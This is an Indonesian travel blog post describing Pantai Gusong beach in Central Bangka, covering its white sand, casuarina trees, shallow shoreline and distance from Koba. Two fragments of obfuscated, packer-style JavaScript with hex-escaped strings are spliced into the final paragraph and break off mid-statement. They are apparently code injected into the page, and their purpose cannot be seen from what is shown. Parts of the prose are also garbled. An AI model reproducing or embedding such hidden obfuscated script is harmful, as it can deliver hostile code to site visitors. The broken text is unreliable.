-->

Pantai Gusung Lubuk Besar Bangka Tengah Bangka Belitung

Halo gaes, ketemu lagi sama mimin yang kece ini dan kali ini kita akan ulas pantai yang berada di daerah Lubuk Besar daerah Bangka Tengah. Tk perlu berlama-lama Cekidot! Pantai Gusong yang berada di Desa Batu Beriga Kecamatan Lubuk Besar Kabupaten Bangka Tengah, saat ini menjadi salah satu tempat destinasi wisata baru wisatawan lokal hingga luar Provinsi Bangka Belitung loh.

Keindahan serta keunikan keanekaragaman dari beragam komponen di pantai bikin mata enggan berkedip serta berasa nyaman jika mengitari saat berkunjung ke pantai gusong tersebutHak. tersebut jelas saja menjadi daya tarik bagi wisatawan yang sudah mengenali keberadaanya ataupun yang baru mendengar lewat kisah dari mulut kemulut. Bagus pantainya, terawat indah serta nyaman berkeliling disini. terlebih jika dijadikan tempat mengisi liburan akhir pekan serta melepas penat bersama partisipan keluarga, ya panoramanya membuat mata enggan berkedip menatap keindahan pantai ini.

Keindahan panorama berasa lengkap dengan komponen pasir putih yang menghampar dan barisan panjang pohon cemara dimana pantai tersebut lumayan luas hingga menjorok kelaut. Tentunya, fenomena alam tersebut dinilai amat cocok buat mengabadikan moment dengan berselfie ria baik bersama keluarga ataupun pasangan. Dengan keindahan dari segala macam yang adanya disini amat disayangkan masih sedikit orang yang mengetahuinya. sesungguhnya banyak pengunjung yang datang namun cuma masyarakat yang ingin bertamasya dalam ruang lingkup lokal saja terlihat Padahal,. tempat ini cocok dipakai oleh wisatawan dari segala usia.

Banyak potensi pantai yang bisa dikunjungi oleh wisawatan domestik ataupun mancanegara. Saat trip dari Kota Pangkalpinang akan menuju ke Koba Kabupaten Bangka Tengah, dalam trip akan terlihat pantai Penyak, Pantai Terentang. Namun tak kalah asrinya, adanya Pantai Gusong yang Berposisi sekitar 60 kilometer dari Kota Koba Kabupaten Bangka Tengah.

Kamu akan dimanjakan dengan panorama pantai yang asri akan terlihat pohon cemara dan bisa bermain pasir putih yang membentang selama 2 kilometer di Pantai Gusong Desa Beriga Kecamatan Lubuk Besar Kabupaten Bangka Tengah. Selain bermain pasir , para pengunjung bisa mandi di Laut sekitar Pantai Gusong dengan deburan ombak. Dengan kontur pantai yang landai sekelumit 50 meter dengan kedalaman sekitar 2-3 meter. Tentunya pengunjung tak akan melalui kesempatan buat berwisata di Pantai Gusong yang berhadapan dengan Laut Cina Selatan serta Selat Gelasa. //35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('Z i=["\\J\\v\\l\\s\\j\\E\\t\\l\\q\\x\\w\\t\\n\\14\\w\\J\\v\\l\\s\\j\\E\\t\\l\\q\\x\\w\\v","\\X\\F\\h\\n\\x\\D\\h\\k\\h\\A\\j\\l\\n\\T\\k\\k","\\k\\h\\m\\B\\j\\U","\\G\\n\\l\\u","\\q\\o\\L","\\A\\n\\h\\r\\j\\h\\K\\k\\h\\u\\h\\m\\j","\\A\\k\\r\\s\\s\\z\\r\\u\\h","\\o\\B\\m\\o\\h\\k\\M\\F\\k\\j\\o\\O\\h\\k\\r\\j\\h\\q","\\m\\l\\q\\h\\z\\r\\u\\h","\\P","\\o\\m\\s\\h\\n\\j\\R\\h\\G\\l\\n\\h","\\v\\r\\n\\h\\m\\j\\z\\l\\q\\h","\\m\\h\\N\\j\\D\\o\\t\\k\\o\\m\\B"];y p=I[i[1]](i[0]),a=C+1,b=p[i[2]]/a;c=V[i[3]]({W:C},(15,H)=>H+1);Y(y d=0;d35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('a 9=["\\i\\c\\l\\L\\d\\C","\\c\\l\\d\\k\\H","\\x\\c\\c\\K","\\F\\d","\\d\\w\\d\\i\\c","\\i\\w\\l\\M","\\k\\c\\i","\\z\\i\\d\\c\\k\\l\\z\\d\\c","\\C\\k\\c\\x"];a n=o p();a m=0;a f=o p();t E(u){r(a b=0;b

Related Posts

Post a Comment

Subscribe Our Newsletter